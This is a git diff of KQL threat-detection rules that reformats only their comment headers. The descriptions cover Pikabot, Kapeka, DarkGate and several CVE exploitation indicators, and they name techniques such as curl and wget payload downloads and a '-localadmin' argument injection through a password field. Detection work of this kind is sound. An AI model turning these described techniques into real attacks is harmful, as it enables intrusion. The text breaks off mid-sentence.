attack.t1218.011, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql index 9e970a18..e89e99dc 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql @@ -3,7 +3,6 @@ // Date: 2024-01-26 // Level: high // Description: Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql index 25babf40..83db92ba 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql @@ -3,8 +3,7 @@ // Date: 2024-07-03 // Level: high // Description: Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges. -The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection. - +// The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql index 28666930..b9c6973f 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql @@ -3,9 +3,8 @@ // Date: 2024-01-02 // Level: medium // Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. -Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. -In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files. - +// Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. +// In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.command-and-control, attack.execution, attack.t1059.003, attack.t1105, attack.t1218, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql index 783e71f2..d34b78ea 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql @@ -3,8 +3,7 @@ // Date: 2024-03-07 // Level: high // Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. -This behavior was observed in multiple Raspberry-Robin variants. - +// This behavior was observed in multiple Raspberry-Robin variants. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql index 59bab07f..df9b7bc2 100644 --- a/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql +++ b/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql @@ -3,7 +3,6 @@ // Date: 2024-02-23 // Level: high // Description: Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql b/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql index a858f485..ae88791b 100644 --- a/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql +++ b/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql @@ -3,8 +3,7 @@ // Date: 2023-10-27 // Level: high // Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups. -The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute). - +// The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute). // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1016, attack.t1049, attack.t1087, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql b/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql index e0ff3f49..c2d2c1bb 100644 --- a/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql +++ b/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql @@ -3,9 +3,8 @@ // Date: 2021-03-03 // Level: high // Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for -creation of non-standard files on disk by Exchange Server’s Unified Messaging service -which could indicate dropping web shells or other malicious content - +// creation of non-standard files on disk by Exchange Server’s Unified Messaging service +// which could indicate dropping web shells or other malicious content // MITRE Tactic: Execution // Tags: attack.t1203, attack.execution, cve.2021-26858, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql index f5e23c68..1c519e6b 100644 --- a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql +++ b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql @@ -3,7 +3,6 @@ // Date: 2023-11-14 // Level: high // Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql index 97fc683c..6153f5d8 100644 --- a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql +++ b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql @@ -3,7 +3,6 @@ // Date: 2023-11-14 // Level: medium // Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql b/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql index a24e7133..ae1712b0 100644 --- a/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql +++ b/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql @@ -3,9 +3,8 @@ // Date: 2023-10-15 // Level: high // Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within -the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate -command-and-control server. - +// the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate +// command-and-control server. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql b/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql index 7fba0278..35f50aec 100644 --- a/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql +++ b/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql @@ -3,8 +3,7 @@ // Date: 2022-04-22 // Level: high // Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. -The ".lnk" file was delivered via phishing campaign. - +// The ".lnk" file was delivered via phishing campaign. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.006, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql b/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql index 17c7a2b9..142431b5 100644 --- a/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql +++ b/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql @@ -3,8 +3,7 @@ // Date: 2025-10-31 // Level: high // Description: Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe. -This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities. - +// This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities. // MITRE Tactic: Execution // Tags: attack.execution, attack.initial-access, attack.t1190, attack.t1203, cve.2025-59287, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql b/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql index 9b7d3ade..3c133795 100644 --- a/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql +++ b/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql @@ -3,7 +3,6 @@ // Date: 2024-12-19 // Level: high // Description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild. - // MITRE Tactic: Execution // Tags: attack.execution, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql index df9d507b..383669a1 100644 --- a/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql +++ b/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql @@ -3,8 +3,7 @@ // Date: 2024-07-03 // Level: high // Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe. -The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In. - +// The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.011, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql b/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql index ae1da639..65b80b63 100644 --- a/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql +++ b/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql @@ -3,9 +3,8 @@ // Date: 2025-05-22 // Level: high // Description: Detects loading of DLLs associated with Katz Stealer malware 2025 variants. -Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems. -The process that loads these DLLs are very likely to be malicious. - +// Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems. +// The process that loads these DLLs are very likely to be malicious. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1129, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql index 7fd5578e..bb7a3923 100644 --- a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql +++ b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql @@ -3,8 +3,7 @@ // Date: 2024-07-29 // Level: medium // Description: Detects potential APT FIN7 exploitation activity as reported by Google. -In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains. - +// In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.001, attack.t1059.003, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql index f4a71b7c..4d683ad4 100644 --- a/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql @@ -3,8 +3,7 @@ // Date: 2022-04-25 // Level: medium // Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. -As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application. - +// As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application. // MITRE Tactic: Execution // Tags: attack.execution, attack.initial-access, attack.t1059.006, attack.t1190, cve.2022-22954, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql index 1e55dc25..a3e6f1d8 100644 --- a/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql @@ -3,9 +3,8 @@ // Date: 2022-04-17 // Level: high // Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. -7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. -The command runs in a child process under the 7zFM.exe process. - +// 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. +// The command runs in a child process under the 7zFM.exe process. // MITRE Tactic: Execution // Tags: attack.execution, cve.2022-29072, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql index 8f7633e4..75b24ef8 100644 --- a/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql +++ b/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql @@ -3,8 +3,7 @@ // Date: 2024-04-25 // Level: medium // Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. -As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function. - +// As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function. // MITRE Tactic: Execution // Tags: attack.execution, cve.2024-3400, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql index c60da680..a54eeafb 100644 --- a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql +++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql @@ -3,7 +3,6 @@ // Date: 2024-04-01 // Level: high // Description: Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094. - // MITRE Tactic: Execution // Tags: attack.execution, cve.2024-3094, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql index 5f0c094c..e78bde86 100644 --- a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql +++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql @@ -3,9 +3,8 @@ // Date: 2024-07-29 // Level: high // Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins". -This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. -VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default. - +// This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. +// VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default. // MITRE Tactic: Execution // Tags: attack.execution, cve.2024-37085, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql b/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql index 097b0835..f8b17238 100644 --- a/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql +++ b/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql @@ -3,8 +3,7 @@ // Date: 2024-03-22 // Level: medium // Description: Detects the execution of a Word document via the WinWord Start Menu shortcut. -This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection. - +// This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql b/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql index 0ce123a9..9e1f9678 100644 --- a/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql +++ b/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql @@ -3,13 +3,9 @@ // Date: 2023-06-01 // Level: medium // Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. - -MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. - -Hunting Opportunity - -Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated. - +// MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. +// Hunting Opportunity +// Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059, cve.2023-34362, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql index 0e155f3c..28a6bee9 100644 --- a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql +++ b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql @@ -3,8 +3,7 @@ // Date: 2025-04-28 // Level: medium // Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, -which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324. - +// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324. // MITRE Tactic: Execution // Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql index 41d16930..8b541c12 100644 --- a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql +++ b/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql @@ -3,8 +3,7 @@ // Date: 2025-04-28 // Level: medium // Description: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, -which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324. - +// which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324. // MITRE Tactic: Execution // Tags: attack.execution, attack.initial-access, attack.t1190, attack.persistence, attack.t1059.003, cve.2025-31324, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql b/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql index 7e281dd2..202c6756 100644 --- a/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql +++ b/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql @@ -3,7 +3,6 @@ // Date: 2023-07-16 // Level: high // Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql b/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql index 26f130b7..421b5713 100644 --- a/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql +++ b/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql @@ -3,8 +3,7 @@ // Date: 2025-10-20 // Level: high // Description: Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791. -An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token. - +// An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token. // MITRE Tactic: Initial Access // Tags: attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-57791 diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql b/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql index 40f07b02..aa0f682f 100644 --- a/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql +++ b/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql @@ -3,7 +3,6 @@ // Date: 2024-12-09 // Level: high // Description: Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline. - // MITRE Tactic: Initial Access // Tags: attack.initial-access, attack.execution, attack.t1190, cve.2024-50623, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql b/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql index aacf7839..b6f58511 100644 --- a/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql +++ b/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql @@ -3,7 +3,6 @@ // Date: 2022-01-14 // Level: high // Description: Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j. - // MITRE Tactic: Initial Access // Tags: attack.initial-access, attack.t1190, cve.2021-44228, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql index e660a078..e15251a5 100644 --- a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql +++ b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql @@ -3,8 +3,7 @@ // Date: 2025-10-07 // Level: high // Description: Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035. -This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175. - +// This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175. // MITRE Tactic: Initial Access // Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.persistence, attack.t1133, detection.emerging-threats, cve.2025-10035 // False Positives: diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql index cb67a2eb..0beb7cdb 100644 --- a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql +++ b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql @@ -3,8 +3,7 @@ // Date: 2025-07-21 // Level: critical // Description: Detects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770. -CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. - +// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. // MITRE Tactic: Initial Access // Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql index 7be0e5cc..94159740 100644 --- a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql +++ b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql @@ -3,8 +3,7 @@ // Date: 2025-07-21 // Level: high // Description: Detects potential exploitation of CVE-2025-53770 by identifying indicators such as suspicious command lines discovered in Post-Exploitation activities. -CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. - +// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. // MITRE Tactic: Initial Access // Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql b/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql index 3d5f9f76..b291ca19 100644 --- a/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql +++ b/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql @@ -3,9 +3,8 @@ // Date: 2025-04-10 // Level: medium // Description: Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as -CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests. -The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands. - +// CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests. +// The detection focuses on commonly abused Windows executables (like 